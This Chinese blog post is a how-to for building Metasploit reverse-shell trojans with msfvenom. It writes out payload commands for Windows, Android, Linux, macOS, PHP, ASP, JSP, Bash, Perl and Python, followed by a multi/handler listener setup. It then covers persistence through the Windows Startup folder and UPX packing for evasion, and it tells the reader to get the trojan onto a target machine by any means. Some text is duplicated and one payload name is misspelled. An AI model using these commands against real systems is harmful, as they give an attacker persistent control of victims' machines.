msf美少妇使用

最新推荐文章于 2023-03-29 21:54:04 发布
最新推荐文章于 2023-03-29 21:54:04 发布
阅读量604 收藏 2
点赞数
分类专栏: 网络安全 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52149675/article/details/127281982
版权

美少妇使用

使用Msfvenom生成木马渗透

msfvenom命令行选项如下:

英文原版

img

中文版:

Options:

-p, --payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定

-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, --nopsled 为payload预先指定一个NOP滑动长度

-f, --format 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

-e, --encoder [encoder] 指定需要使用的encoder(编码器)

-a, --arch 指定payload的目标架构,这里x86是32位,x64是64位 -platform 指定payload的目标平台

-s, --space 设定有效攻击荷载的最大长度

-b, --bad-chars 设定规避字符集,比如: '\x00\xff'

-i, --iterations 指定payload的编码次数

-c, --add-code 指定一个附加的win32 shellcode文件

-x, --template 指定一个自定义的可执行文件作为模板

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 --payload-options 列举payload的标准选项

-o, --out 保存payload

-v, --var-name 指定一个自定义的变量,以确定输出格式

–shellest 最小化生成payload

-h, --help 查看帮助选项 --help-formats 查看msf支持的输出格式列表

实操

MSF生成木马

我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。

•–p (- -payload-options):添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT,就可以生成对应语言,对应平台的后门了!!!
•–l:查看所有payload encoder nops。
•–f :输出文件格式。
•–e:编码免杀。
•–a:选择架构平台 x86 | x64 | x86_64
•–o:文件输出
•–s:生成payload的最大长度,就是文件大小。
•–b:避免使用的字符 例如:不使用 ‘\0f’。
•–i:编码次数。
•–c:添加自己的shellcode
•–x | -k:捆绑

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.99.131 lport=8888 -f exe -o /muma/test.exe  
# lhost是我们的攻击主机ip,lport是我们主机的用于监听的端口,输出位置可以自定义

image-20221010153620039

我们返回kali 开启msfconsole控制台,执行以下命令

  msfcomsole
  msf > use exploit/multi/handler   #使用exploit/multi/handler监听从肉鸡发来的数据
 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp   
   #设置payload,不同的木马设置不同的payload
  msf exploit(handler) > set lhost 192.168.99.131    #我们的主机ip
 msf exploit(handler) > set lport 8888            #我们的主机监听端口
 msf exploit(handler) > exploit

接下来就是等待目标触发木马了,此时我在物理机点击exe木马,立马弹回meter的会话

在这里插入图片描述

这台主机的shell,如果想持续性控制此主机,可以将木马放在开机启动项中,只要一开机就会触发。

C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

木马还可以进行upx加壳

upx -9 test.exe -k -o test2.exe

下面介绍一些生成其他格式的木马!

安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -o ~/Desktop/test2.apk  
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f  elf > shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f macho >  shell.macho
PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888  -f asp > shell.asp
ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888  -f  aspx > shell.aspx
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f  raw > shell.jsp
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.10.27 LPORT=8888 -f   raw > shell.sh
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.10.27 LPORT=8888 -f raw > shell.pl
Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.10.27 LPORT=8888 -f   raw > shell.py

以上是基本的生成后门木马,只要想方设法放到目标机器上,并运行。在本地监听端口即可,但是你需要有一个公网的ip

eter/reverser_tcp LHOST=192.168.10.27 LPORT=8888 -f raw > shell.py

以上是基本的生成后门木马,只要想方设法放到目标机器上,并运行。在本地监听端口即可,但是你需要有一个公网的ip
crabin_lpb
关注
专栏目录
一篇文章让你快速上手metasploit(美少妇)
weixin_44344395的博客
11-25 1228
Msfconsole基本使用 前言 本文目的仅是分享记录学习过程,请勿用做非法用途。 Metasploit一个号称可以黑掉整个世界的神器,很多初学者刚接触的时候都觉得很复杂。笔者也花了不少的时间也才入手的,下文分享一些简单的用法。 常用参数介绍: 在kali系统里面是集成了接口的,只需要在终端输入msfconsole进入当前页面 即可访问和使用Metasploit里面的所有的插件和模块,以及第三...
[7期]美少妇(msf)和独角兽(unicorn)
05-02 1万+
MSF 全称:metasploit-framework 渗透大杀器,黑客工具排名第一(靠前),尤其在内网中。在校期间大学生先跟本校安全部沟通好,一起实验。 得不到校方理解与认可的上SRC或者自己搭建靶机。为什么在当今,政府,学校,公司等网络不堪一击,就是因为感觉不到损失嘛,你会买保险?出了很多事情了才知道痛,道理都是一样的。组织要赚钱,而安全呢?安全是在烧钱,买着买来,招聘一个信...
9.利用msfvenom生成木马
weixin_30576859的博客
12-01 325
这篇文章来介绍一下msf中一个生成木马的msfvenom模块。 msfvenom命令行选项如下: 英文原版: 中文版: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定 -l, ...
msfvenom java_msfvenom简介
weixin_36111033的博客
02-28 370
写此文是因为网上资料杂乱,不方便查阅,辣眼睛测试免杀的时候刚好用到这个功能,顺便写一下(0202年靠msfvenom生成的纯原生payload可以宣告死亡了,如果有查不出来的杀软可以退群了,这也叫杀软吗太丢人了)在此把个人了解的遇到过的一些关于msfvenom使用过程中的问题根据大佬们的思路整理出来,仅供参考---------------------------------------------...
msfmsfvenom的使用使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3964
msfvenom的使用
msf美少妇)练习
m0_60498383的博客
12-15 2536
1.使用portscan模块 2. 特定扫描: 3. 找mssql主机: 4. ssh服务器扫描: 5. telnet服务器扫描: 6. 主机扫描: 7. 匿名扫描: 8. 扫描局域网存活的主机 9. 扫描网站目录 10.搜索网站中的E-mail地址 11. 嗅探抓包 ...
MSF使用教程
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
msf使用方法
06-29
标题:msf使用方法 描述:本篇详细介绍了Metasploit Framework(简称MSF)的使用方法,MSF是一款强大的渗透测试工具,被广泛应用于安全评估、漏洞利用以及恶意软件研究等领域。以下将深入解析MSF的核心功能及操作...
linux系统安装msf的过程详解
09-14
启动MSF时,建议使用`msf`用户,这样可以确保数据库的正确同步。如果使用`root`用户启动,数据库可能无法正确同步。 MSF有一些常用命令,例如: - `msfconsole`:启动MSF控制台。 - `msfdb`:管理数据库,如初始化...
利用msfvenom制作木马程序(不免杀)
Nanyeer的博客
03-29 1559
制作木马程序进行远程控制(不免杀)
msfvenom生成后门程序及利用
内心不种满鲜花就会长满杂草
04-08 7218
msfvenom
使用msfvenom生成木马用于监听别人的操作
Unitue_逆流
03-20 1万+
msfvenom Options: -p, –payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n,
msfvenom生成木马的简单利用
dodod2012的专栏
07-15 4695
1、简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport.
Msfvenom的简单用法
热门推荐
Shanfenglan's blog
11-04 7万+
CATALOG1.常见高级参数2.常用生成载荷命令2.1 生成linux系统反向shell载荷2.2 生成windows系统载荷2.3 生成web类型载荷2.4 生成语言类载荷 1.常见高级参数 参数字段 效果 set PrependMigrate true 启用迁移进程(默认为:false) set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe set SessionExpirationTimeout 0 会话超时时间0秒
vs无法生成可执行文件_Kali Linux实战篇:基于Msfvenom的病毒生成以及检测规避
weixin_39901358的博客
11-25 435
msfvenom是把Metasploit的有效载荷嵌入到正规可执行文件中的利器。其中多数生成的payload以Meterpreter模块巨多。Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。 可操作参数如下m...
利用msfvenom制作windows木马及免杀马
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...
Metasploit之多种后门生成
weixin_30790841的博客
08-30 446
本章节的后门有以下几种 windows -->使用模块“windows/meterpreter/reverse_tcp” 命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe 参考“09-Metasploit之我的远程控制软件” li...
利用msf生成后门拿shell
qq_36406396的博客
11-15 1万+
kali  x64:192.168.26.136 win7  x86: 192.168.26.128 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload windows/meterpreter/reverse_tcp 输入以下命令生成后门qq.exe 然后将生成的qq.exe移到win7中,然后打开msf
msf 监听模块使用案例
最新发布
06-06
好的,这里给您举一个msf监听模块的使用案例。 假设攻击者想要入侵一家公司的内部网络,他们可以使用msf监听模块来创建一个监听器,以便漏洞利用或后门程序可以与攻击者的系统进行通信。以下是具体步骤: 1. 首先,攻击者需要扫描目标公司的网络,以查找可能存在的漏洞。他们可以使用Metasploit框架中的扫描模块,例如nmap或nessus,来扫描目标网络中的主机和服务。 2. 一旦找到了漏洞,攻击者可以使用Metasploit框架中的漏洞利用模块,例如ms08_067_netapi或ms17_010_eternalblue,来利用目标系统上的漏洞,从而在目标系统上创建一个监听器。 3. 攻击者可以使用msf监听模块来创建一个反向Shell或Meterpreter会话,以便可以通过该会话远程访问目标系统,并执行各种命令和操作。例如,攻击者可以浏览文件系统、上传和下载文件、执行系统命令等等。 4. 攻击者可以使用msf监听模块来创建一个后门程序,以便可以在目标系统上保持持久性访问。例如,攻击者可以创建一个名为Meterpreter的后门程序,该程序可以在目标系统上运行并在后台与攻击者的系统进行通信,以便攻击者可以在需要时访问目标系统。 总之,msf监听模块是Metasploit框架中非常有用的一个模块,它可以帮助攻击者在目标系统上创建一个监听器,从而获得对目标系统的控制。但是,请注意,使用msf监听模块进行非法攻击是违法行为,必须遵守当地法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

crabin_lpb

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值